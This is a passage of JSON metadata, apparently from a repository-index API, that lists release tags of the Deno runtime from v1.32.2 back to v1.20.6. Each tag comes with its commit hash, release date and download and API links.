osyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifes